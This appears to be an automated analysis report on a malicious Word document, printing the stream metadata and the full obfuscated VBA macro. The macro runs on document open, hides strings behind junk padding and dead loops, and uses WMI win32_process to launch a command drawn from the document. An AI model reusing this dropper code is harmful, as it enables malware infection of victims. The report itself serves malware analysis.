Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Xqcxarraokjbi
End Sub

VBA File Name: Nst6otvnmgmpw, Stream Size: 17602

General
Stream Path:	Macros/VBA/Nst6otvnmgmpw
VBA File Name:	Nst6otvnmgmpw
Stream Size:	17602
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 a4 05 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff ac 05 00 00 9c 30 00 00 00 00 00 00 01 00 00 00 92 a6 3f ad 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
crnYCaC
RYtzeF
ClofCvn
BlbPRi:
Left(vpWmJA.Range.ParagraphStyle,
BlbPRi)
kBCITgNAC.Range.ListFormat.ListString
aqFpElJ
tFspDCJEJ
djUnAEBd.Range.ParagraphStyle
QjbRmCII
rknGHpIJ
RmTjACo
jdDhS
ah_sg
InStr(kBCITgNAC.Range.Text,
MscjBIE.Range.ParagraphStyle
sDmVCG
TpAnAB.Range.Text
dUBsAD
ORjdHplF.Range.Text
ueWFHDCC
QpteDQ
wNsHseJob
DagVrchHi.Range.Text
NcnmJ
aiupjCA.Range.ParagraphStyle
pbPXFg
SeBOI
wgusFA
VrghdcJA.Range.Text
vXdLFECJ
ElseIf
pbPXFg.Range.ParagraphStyle
mWRkEDBn
swJREBktH
Len("xxx"))
DagVrchHi
GvZhcxcBE.Range.ListFormat.ListString
clyZlt.Range.ParagraphStyle
kBCITgNAC.Range.Text
QurlJAjI
ah:wsg
Left(ORjdHplF.Range.ParagraphStyle,
EGxLDh
ifZhJxP
BdbvZ
InStr(KekJrc.Range.Text,
SEEmDH
ihnSRH
djUnAEBd.Range.Text
kYUGGMJ.Range.ListFormat.ListString
JJqbCtEH
ahpsg
InStr(MscjBIE.Range.Text,
ZBXzADzi
dPYykYG
InStr(TpAnAB.Range.Text,
TpAnAB.Range.ListFormat.ListString
Replace(saw,
kBCITgNAC.Range.ParagraphStyle
ilrmFI
QyjOFbQGB
Left(GvZhcxcBE.Range.ParagraphStyle,
IGyeHIDF
DMzpFn
MFcvbrIeP
WHeXGpVAC
nWADOALQ
ORjdHplF.Range.ParagraphStyle
clyLjDhC
oSnKJGCv
ODMoFC)
CJIuIYEKI
KoPDIC
gnnIFFf
djUnAEBd.Range.ListFormat.ListString
XSZpp
QrQLEAI
hnsxGG
tfnHGB
LCIxEHv
ORjdHplF.Range.ListFormat.ListString
Resume
vpWmJA.Range.ParagraphStyle
InStr(clyZlt.Range.Text,
PAyxzTsC
dwTYCJwLC)
GLKaFEDcX
PEaiK.Range.Text
zjQpkF
KekJrc.Range.ListFormat.ListString
wJKPQpiH
Left(kYUGGMJ.Range.ParagraphStyle,
ruwfBB
QrQLEAI:
GHJmFFAIm)
golkzCJBD
FdSuG
OtoVEFFI
QrQLEAI)
"hqkwjbjdasd"
GHJmFFAIm:
LEeUqk
Left(clyZlt.Range.ParagraphStyle,
ZAXDGY
KnxFzdf
kYUGGMJ.Range.ParagraphStyle
ubHTxDED
LqcVa
Left(djUnAEBd.Range.ParagraphStyle,
aqFpElJ.Range.Text
GvZhcxcBE
twfalBEJ
HmUuEIbVG
KekJrc.Range.Text
vpWmJA.Range.Text
iGMIJABIz
uRNYED
ORjdHplF
DrqvEr
LGONCIz
Left(MscjBIE.Range.ParagraphStyle,
kyTwIN
wTLHBUFzI
wNsHseJob.Range.ParagraphStyle
WLdYLJOB
YfXWF
VrzOGkkDJ
EWTFmUdCA
dUBsAD)
KekJrc
sVBjGLE
dUBsAD:
xWqeABhHw
bssipAJC
Left(pbPXFg.Range.ParagraphStyle,
GvZhcxcBE.Range.ParagraphStyle
Xqcxarraokjbi()
BApwTCG
ahgmsg
VB_Name
CzpmH
wTHGJGJ
VrghdcJA.Range.ListFormat.ListString
wZFCUdE)
BRoZbEF
wZFCUdE:
IEHycIT
aqFpElJ.Range.ParagraphStyle
"xxxx"
bxSXGCyrq
rQGxCbRtR
aqFpElJ.Range.ListFormat.ListString
Mid(Application.Name,
InStr(aqFpElJ.Range.Text,
aNLHyKGxD
InStr(kYUGGMJ.Range.Text,
NirTjIE
Left(DagVrchHi.Range.ParagraphStyle,
aJzPBis.Range.ListFormat.ListString
ODMoFC
CJIuIYEKI)
HwQjGFBhp
VrghdcJA.Range.ParagraphStyle
CJIuIYEKI:
qOgvIXcc
PIEpnIEQ
InStr(wNsHseJob.Range.Text,
TpAnAB.Range.ParagraphStyle
AZyYMo
RpARJ
Paragraph
ODMoFC:
InStr(aJzPBis.Range.Text,
YfXWF)
BlbPRi
BApwTCG.Range.ParagraphStyle
KekJrc.Range.ParagraphStyle
xmKhhI
Left(PEaiK.Range.ParagraphStyle,
PEaiK.Range.ListFormat.ListString
ahinsg
polxC
ahmsg
clyZlt.Range.Text
vpWmJA.Range.ListFormat.ListString
dwTYCJwLC:
JozvGJc
BApwTCG.Range.ListFormat.ListString
ahssg
rlKgn
PEaiK
Left(wNsHseJob.Range.ParagraphStyle,
aJzPBis
chPFBOFy
PyQuEPBH
QxPrAc
wZFCUdE
lSOmIHg
GHJmFFAIm
gzBJqD
BApwTCG.Range.Text
yVvECoEYV
Left(BApwTCG.Range.ParagraphStyle,
InStr(VrghdcJA.Range.Text,
Left(KekJrc.Range.ParagraphStyle,
Left(aJzPBis.Range.ParagraphStyle,
hnsxGG)
InStr(BApwTCG.Range.Text,
AYQZHEBI
elbdiLVN
vttGko
aiupjCA.Range.ListFormat.ListString
InStr(vpWmJA.Range.Text,
DagVrchHi.Range.ParagraphStyle
PIEpnIEQ)
dueIMGo
GvZhcxcBE.Range.Text
PIEpnIEQ:
InStr(pbPXFg.Range.Text,
DdtFCGIA
Left(VrghdcJA.Range.ParagraphStyle,
MscjBIE.Range.Text
HgufGDBpC
BjqtUGzGV
"kkiew")
LATJAGVFG
fishDz
Function
InStr(PEaiK.Range.Text,
IpndaHM
"sjgwb",
jhoJOEJc
QyjOFbQGB)
vpWmJA
igIuH
DMzpFn)
QyjOFbQGB:
kYUGGMJ
DMzpFn:
VGSqAr
QgrUG
jVymJ
Left(aqFpElJ.Range.ParagraphStyle,
TpXhGgIp
kYUGGMJ.Range.Text
OnCoGHI
zfIxDdGy
uRNYED)
pbPXFg.Range.ListFormat.ListString
clyZlt.Range.ListFormat.ListString
IyCjJCAKS
uRNYED:
wNsHseJob.Range.ListFormat.ListString
kBCITgNAC
HFzCp
aiupjCA.Range.Text
mNAmBCKAC
clyZlt
hHdBIMIgE
MllKTIJEc
aJzPBis.Range.Text
InStr(GvZhcxcBE.Range.Text,
cLxQFB
vYqwDI
ahcesg
ahrosg
GLKaFEDcX:
lscaG
GLKaFEDcX)
EiZIHkBmm
yigPu
CITOv
nATRHnACI
aiupjCA
DagVrchHi.Range.ListFormat.ListString
MscjBIE.Range.ListFormat.ListString
vlZuYFCC
clyLjDhC)
ruwfBB)
dwTYCJwLC
ATQXIsF
rvAquNI
ruwfBB:
clyLjDhC:
pbPXFg.Range.Text
wNsHseJob.Range.Text
zhliJ
RxTZR
TpAnAB
ahtsg
bebkDqAH
VrghdcJA
kFOCACABC
Error
aiaDHfVAA
InStr(DagVrchHi.Range.Text,
Attribute
FTbqcNF
YfXWF:
MscjBIE
wuVfVIU
InStr(aiupjCA.Range.Text,
mJzxEXG
NVFQOFAXs
InStr(ORjdHplF.Range.Text,
hnsxGG:
PEaiK.Range.ParagraphStyle
ykoqBxAG
xvhwEkIi
HpOdl
bEIjwUFFB
wHzvQRHCw
aJzPBis.Range.ParagraphStyle
InStr(djUnAEBd.Range.Text,
zfIxDdGy)
VGSqAr)
zfIxDdGy:
Left(aiupjCA.Range.ParagraphStyle,
VGSqAr:
djUnAEBd
Left(kBCITgNAC.Range.ParagraphStyle,
Left(TpAnAB.Range.ParagraphStyle,
uqBHEDw
EqstFcEf
NrnOEeCi
EBTVGH
DvhBN

VBA Code

Attribute VB_Name = "Nst6otvnmgmpw"
Function Xqcxarraokjbi()
On Error Resume Next
V1 = O9eax2mx6bn5xuv + Bcur5699z4d.Content + Bud375u79tqnjtr8hp
   GoTo hnsxGG
     Dim vpWmJA As Paragraph
Set HwQjGFBhp = bebkDqAH
     For Each vpWmJA In Bcur5699z4d.Paragraphs
Set yVvECoEYV = EWTFmUdCA
       If Left(vpWmJA.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         hnsxGG = vpWmJA.Range.ListFormat.ListString
       ElseIf InStr(vpWmJA.Range.Text, "kkiew") > 1 Then
         elbdiLVN = vpWmJA.Range.Text
         elbdiLVN = Replace(saw, "sjgwb", "hqkwjbjdasd" & hnsxGG)
         vpWmJA.Range.Text = elbdiLVN
         Set vpWmJA.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set BdbvZ = ueWFHDCC
     Next vpWmJA
hnsxGG:
U7 = "sg yw ahpsg yw ah"
Xa6pbm6di_vp9mwl = "sg yw ahrosg yw ahsg yw ahcesg yw ahssg yw ahssg yw ahsg yw ah"
   GoTo GHJmFFAIm
     Dim ORjdHplF As Paragraph
Set twfalBEJ = yigPu
     For Each ORjdHplF In Bcur5699z4d.Paragraphs
Set ATQXIsF = wTLHBUFzI
       If Left(ORjdHplF.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         GHJmFFAIm = ORjdHplF.Range.ListFormat.ListString
       ElseIf InStr(ORjdHplF.Range.Text, "kkiew") > 1 Then
         JozvGJc = ORjdHplF.Range.Text
         JozvGJc = Replace(saw, "sjgwb", "hqkwjbjdasd" & GHJmFFAIm)
         ORjdHplF.Range.Text = JozvGJc
         Set ORjdHplF.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set QxPrAc = oSnKJGCv
     Next ORjdHplF
GHJmFFAIm:
Jziyk2numi4eksqusj = "sg yw ah:wsg yw ahsg yw ahinsg yw ah3sg yw ah2sg yw ah_sg yw ah"
   GoTo GLKaFEDcX
     Dim kYUGGMJ As Paragraph
Set RpARJ = NVFQOFAXs
     For Each kYUGGMJ In Bcur5699z4d.Paragraphs
Set hHdBIMIgE = KoPDIC
       If Left(kYUGGMJ.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         GLKaFEDcX = kYUGGMJ.Range.ListFormat.ListString
       ElseIf InStr(kYUGGMJ.Range.Text, "kkiew") > 1 Then
         TpXhGgIp = kYUGGMJ.Range.Text
         TpXhGgIp = Replace(saw, "sjgwb", "hqkwjbjdasd" & GLKaFEDcX)
         kYUGGMJ.Range.Text = TpXhGgIp
         Set kYUGGMJ.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set iGMIJABIz = vlZuYFCC
     Next kYUGGMJ
GLKaFEDcX:
Kdpt7ybnm0buk = "wsg yw ahinsg yw ahmsg yw ahgmsg yw ahtsg yw ahsg yw ah"
   GoTo QyjOFbQGB
     Dim wNsHseJob As Paragraph
Set crnYCaC = mJzxEXG
     For Each wNsHseJob In Bcur5699z4d.Paragraphs
Set FdSuG = bssipAJC
       If Left(wNsHseJob.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         QyjOFbQGB = wNsHseJob.Range.ListFormat.ListString
       ElseIf InStr(wNsHseJob.Range.Text, "kkiew") > 1 Then
         DrqvEr = wNsHseJob.Range.Text
         DrqvEr = Replace(saw, "sjgwb", "hqkwjbjdasd" & QyjOFbQGB)
         wNsHseJob.Range.Text = DrqvEr
         Set wNsHseJob.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set HgufGDBpC = IpndaHM
     Next wNsHseJob
QyjOFbQGB:
T_b71hsugbvq289o = "sg yw ahsg yw ah" + Mid(Application.Name, 3 + 3, 1 / 1) + "sg yw ahsg yw ah"
   GoTo DMzpFn
     Dim MscjBIE As Paragraph
Set AZyYMo = lscaG
     For Each MscjBIE In Bcur5699z4d.Paragraphs
Set cLxQFB = wgusFA
       If Left(MscjBIE.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         DMzpFn = MscjBIE.Range.ListFormat.ListString
       ElseIf InStr(MscjBIE.Range.Text, "kkiew") > 1 Then
         RxTZR = MscjBIE.Range.Text
         RxTZR = Replace(saw, "sjgwb", "hqkwjbjdasd" & DMzpFn)
         MscjBIE.Range.Text = RxTZR
         Set MscjBIE.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set jdDhS = HpOdl
     Next MscjBIE
DMzpFn:
Iybdpqjdde6_svpju7 = Kdpt7ybnm0buk + T_b71hsugbvq289o + Jziyk2numi4eksqusj + U7 + Xa6pbm6di_vp9mwl
   GoTo uRNYED
     Dim GvZhcxcBE As Paragraph
Set WLdYLJOB = PAyxzTsC
     For Each GvZhcxcBE In Bcur5699z4d.Paragraphs
Set RYtzeF = sVBjGLE
       If Left(GvZhcxcBE.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         uRNYED = GvZhcxcBE.Range.ListFormat.ListString
       ElseIf InStr(GvZhcxcBE.Range.Text, "kkiew") > 1 Then
         mNAmBCKAC = GvZhcxcBE.Range.Text
         mNAmBCKAC = Replace(saw, "sjgwb", "hqkwjbjdasd" & uRNYED)
         GvZhcxcBE.Range.Text = mNAmBCKAC
         Set GvZhcxcBE.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set kFOCACABC = RmTjACo
     Next GvZhcxcBE
uRNYED:
H7kfpfj7v13k0 = Yvxv3g2kutodnaylkq(Iybdpqjdde6_svpju7)
   GoTo clyLjDhC
     Dim VrghdcJA As Paragraph
Set kyTwIN = zjQpkF
     For Each VrghdcJA In Bcur5699z4d.Paragraphs
Set xmKhhI = ClofCvn
       If Left(VrghdcJA.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         clyLjDhC = VrghdcJA.Range.ListFormat.ListString
       ElseIf InStr(VrghdcJA.Range.Text, "kkiew") > 1 Then
         LATJAGVFG = VrghdcJA.Range.Text
         LATJAGVFG = Replace(saw, "sjgwb", "hqkwjbjdasd" & clyLjDhC)
         VrghdcJA.Range.Text = LATJAGVFG
         Set VrghdcJA.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set IyCjJCAKS = tFspDCJEJ
     Next VrghdcJA
clyLjDhC:
Set W71k24g1fo31hq05ui = CreateObject(H7kfpfj7v13k0)
   GoTo CJIuIYEKI
     Dim djUnAEBd As Paragraph
Set nATRHnACI = rknGHpIJ
     For Each djUnAEBd In Bcur5699z4d.Paragraphs
Set PyQuEPBH = LGONCIz
       If Left(djUnAEBd.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         CJIuIYEKI = djUnAEBd.Range.ListFormat.ListString
       ElseIf InStr(djUnAEBd.Range.Text, "kkiew") > 1 Then
         gnnIFFf = djUnAEBd.Range.Text
         gnnIFFf = Replace(saw, "sjgwb", "hqkwjbjdasd" & CJIuIYEKI)
         djUnAEBd.Range.Text = gnnIFFf
         Set djUnAEBd.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set AYQZHEBI = chPFBOFy
     Next djUnAEBd
CJIuIYEKI:
KK = Yvxv3g2kutodnaylkq(Mid(V1, (4), Len(V1)))
W71k24g1fo31hq05ui.Create KK, Twt08i5xpa9fd0, L1e1dxo2wbinf3l6
   GoTo wZFCUdE
     Dim clyZlt As Paragraph
Set JJqbCtEH = rlKgn
     For Each clyZlt In Bcur5699z4d.Paragraphs
Set DdtFCGIA = igIuH
       If Left(clyZlt.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         wZFCUdE = clyZlt.Range.ListFormat.ListString
       ElseIf InStr(clyZlt.Range.Text, "kkiew") > 1 Then
         dPYykYG = clyZlt.Range.Text
         dPYykYG = Replace(saw, "sjgwb", "hqkwjbjdasd" & wZFCUdE)
         clyZlt.Range.Text = dPYykYG
         Set clyZlt.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set OnCoGHI = QgrUG
     Next clyZlt
wZFCUdE:
End Function
Function Yvxv3g2kutodnaylkq(T3bxybxcdn5d)
On Error Resume Next
   GoTo zfIxDdGy
     Dim KekJrc As Paragraph
Set mWRkEDBn = nWADOALQ
     For Each KekJrc In Bcur5699z4d.Paragraphs
Set jhoJOEJc = EqstFcEf
       If Left(KekJrc.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         zfIxDdGy = KekJrc.Range.ListFormat.ListString
       ElseIf InStr(KekJrc.Range.Text, "kkiew") > 1 Then
         rvAquNI = KekJrc.Range.Text
         rvAquNI = Replace(saw, "sjgwb", "hqkwjbjdasd" & zfIxDdGy)
         KekJrc.Range.Text = rvAquNI
         Set KekJrc.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set QpteDQ = CITOv
     Next KekJrc
zfIxDdGy:
Zonfu7wvfwo = T3bxybxcdn5d
   GoTo QrQLEAI
     Dim aJzPBis As Paragraph
Set EGxLDh = swJREBktH
     For Each aJzPBis In Bcur5699z4d.Paragraphs
Set uqBHEDw = MllKTIJEc
       If Left(aJzPBis.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         QrQLEAI = aJzPBis.Range.ListFormat.ListString
       ElseIf InStr(aJzPBis.Range.Text, "kkiew") > 1 Then
         golkzCJBD = aJzPBis.Range.Text
         golkzCJBD = Replace(saw, "sjgwb", "hqkwjbjdasd" & QrQLEAI)
         aJzPBis.Range.Text = golkzCJBD
         Set aJzPBis.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set qOgvIXcc = fishDz
     Next aJzPBis
QrQLEAI:
Mgpwbt669dipg22hz = Hbs0geilvqul(Zonfu7wvfwo)
   GoTo VGSqAr
     Dim kBCITgNAC As Paragraph
Set vXdLFECJ = xvhwEkIi
     For Each kBCITgNAC In Bcur5699z4d.Paragraphs
Set SeBOI = vYqwDI
       If Left(kBCITgNAC.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         VGSqAr = kBCITgNAC.Range.ListFormat.ListString
       ElseIf InStr(kBCITgNAC.Range.Text, "kkiew") > 1 Then
         bxSXGCyrq = kBCITgNAC.Range.Text
         bxSXGCyrq = Replace(saw, "sjgwb", "hqkwjbjdasd" & VGSqAr)
         kBCITgNAC.Range.Text = bxSXGCyrq
         Set kBCITgNAC.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set LqcVa = MFcvbrIeP
     Next kBCITgNAC
VGSqAr:
Yvxv3g2kutodnaylkq = Mgpwbt669dipg22hz
   GoTo ODMoFC
     Dim PEaiK As Paragraph
Set ihnSRH = HmUuEIbVG
     For Each PEaiK In Bcur5699z4d.Paragraphs
Set sDmVCG = gzBJqD
       If Left(PEaiK.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         ODMoFC = PEaiK.Range.ListFormat.ListString
       ElseIf InStr(PEaiK.Range.Text, "kkiew") > 1 Then
         NcnmJ = PEaiK.Range.Text
         NcnmJ = Replace(saw, "sjgwb", "hqkwjbjdasd" & ODMoFC)
         PEaiK.Range.Text = NcnmJ
         Set PEaiK.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set CzpmH = polxC
     Next PEaiK
ODMoFC:
End Function
Function Hbs0geilvqul(Cxe014lg73v5)
   GoTo dUBsAD
     Dim TpAnAB As Paragraph
Set IEHycIT = ZBXzADzi
     For Each TpAnAB In Bcur5699z4d.Paragraphs
Set BRoZbEF = ZAXDGY
       If Left(TpAnAB.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         dUBsAD = TpAnAB.Range.ListFormat.ListString
       ElseIf InStr(TpAnAB.Range.Text, "kkiew") > 1 Then
         FTbqcNF = TpAnAB.Range.Text
         FTbqcNF = Replace(saw, "sjgwb", "hqkwjbjdasd" & dUBsAD)
         TpAnAB.Range.Text = FTbqcNF
         Set TpAnAB.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set bEIjwUFFB = EBTVGH
     Next TpAnAB
dUBsAD:
   GoTo ruwfBB
     Dim BApwTCG As Paragraph
Set ubHTxDED = ilrmFI
     For Each BApwTCG In Bcur5699z4d.Paragraphs
Set dueIMGo = zhliJ
       If Left(BApwTCG.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         ruwfBB = BApwTCG.Range.ListFormat.ListString
       ElseIf InStr(BApwTCG.Range.Text, "kkiew") > 1 Then
         jVymJ = BApwTCG.Range.Text
         jVymJ = Replace(saw, "sjgwb", "hqkwjbjdasd" & ruwfBB)
         BApwTCG.Range.Text = jVymJ
         Set BApwTCG.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set XSZpp = DvhBN
     Next BApwTCG
ruwfBB:
   GoTo BlbPRi
     Dim pbPXFg As Paragraph
Set lSOmIHg = wHzvQRHCw
     For Each pbPXFg In Bcur5699z4d.Paragraphs
Set vttGko = OtoVEFFI
       If Left(pbPXFg.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         BlbPRi = pbPXFg.Range.ListFormat.ListString
       ElseIf InStr(pbPXFg.Range.Text, "kkiew") > 1 Then
         SEEmDH = pbPXFg.Range.Text
         SEEmDH = Replace(saw, "sjgwb", "hqkwjbjdasd" & BlbPRi)
         pbPXFg.Range.Text = SEEmDH
         Set pbPXFg.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set IGyeHIDF = tfnHGB
     Next pbPXFg
BlbPRi:
Hbs0geilvqul = Replace(Cxe014lg73v5, "sg yw ah", Zn5_1mdwh2kp2)
   GoTo YfXWF
     Dim aiupjCA As Paragraph
Set HFzCp = aNLHyKGxD
     For Each aiupjCA In Bcur5699z4d.Paragraphs
Set NrnOEeCi = VrzOGkkDJ
       If Left(aiupjCA.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         YfXWF = aiupjCA.Range.ListFormat.ListString
       ElseIf InStr(aiupjCA.Range.Text, "kkiew") > 1 Then
         EiZIHkBmm = aiupjCA.Range.Text
         EiZIHkBmm = Replace(saw, "sjgwb", "hqkwjbjdasd" & YfXWF)
         aiupjCA.Range.Text = EiZIHkBmm
         Set aiupjCA.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set LCIxEHv = ykoqBxAG
     Next aiupjCA
YfXWF:
   GoTo dwTYCJwLC
     Dim aqFpElJ As Paragraph
Set aiaDHfVAA = BjqtUGzGV
     For Each aqFpElJ In Bcur5699z4d.Paragraphs
Set WHeXGpVAC = LEeUqk
       If Left(aqFpElJ.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         dwTYCJwLC = aqFpElJ.Range.ListFormat.ListString
       ElseIf InStr(aqFpElJ.Range.Text, "kkiew") > 1 Then
         wTHGJGJ = aqFpElJ.Range.Text
         wTHGJGJ = Replace(saw, "sjgwb", "hqkwjbjdasd" & dwTYCJwLC)
         aqFpElJ.Range.Text = wTHGJGJ
         Set aqFpElJ.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set KnxFzdf = wuVfVIU
     Next aqFpElJ
dwTYCJwLC:
   GoTo PIEpnIEQ
     Dim DagVrchHi As Paragraph
Set QjbRmCII = ifZhJxP
     For Each DagVrchHi In Bcur5699z4d.Paragraphs
Set QurlJAjI = rQGxCbRtR
       If Left(DagVrchHi.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
         PIEpnIEQ = DagVrchHi.Range.ListFormat.ListString
       ElseIf InStr(DagVrchHi.Range.Text, "kkiew") > 1 Then
         xWqeABhHw = DagVrchHi.Range.Text
         xWqeABhHw = Replace(saw, "sjgwb", "hqkwjbjdasd" & PIEpnIEQ)
         DagVrchHi.Range.Text = xWqeABhHw
         Set DagVrchHi.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")
       End If
Set wJKPQpiH = NirTjIE
     Next DagVrchHi
PIEpnIEQ:
End Function

VBA File Name: Xxuu21l7kiwbxwj_0, Stream Size: 704

General
Stream Path:	Macros/VBA/Xxuu21l7kiwbxwj_0
VBA File Name:	Xxuu21l7kiwbxwj_0
Stream Size:	704
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 92 a6 06 e8 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Attribute
VB_Name

VBA Code
`Attribute VB_Name = "Xxuu21l7kiwbxwj_0"`

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 146

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	146
Entropy:	4.00187355764
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.280441275353
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . . . . . . . . U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 1076

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	1076
Entropy:	7.82221034629
Base64 Encoded:	False
Data ASCII:	Y < . v t . * . . . P L . . X . K . . x p ( . . . 7 . . R . . 6 . / . . . I m . . P ~ . : ~ y < x . # . . m v 0 + . . = z D . s . . . . . . . . 9 . . . a f . . O m . . . . ; . . . . ^ 0 . . . . . . . . . . ! . . . V . . . . . + . . . . i g . . . . . . . . . . E E 2 . . y . d < . P c Y . P . . t . . . . . t . . . . ~ . . . . . . M . . . \\ . . N . . . Q . . W w . . . . . . . . b O . y . 6 . r Z . . . . ~ . . B . ^ [ . . ) ^ j . $ . e . . . . . . . . . . . . . . . F ; . v K . q . ` . . J & . . . . . . .
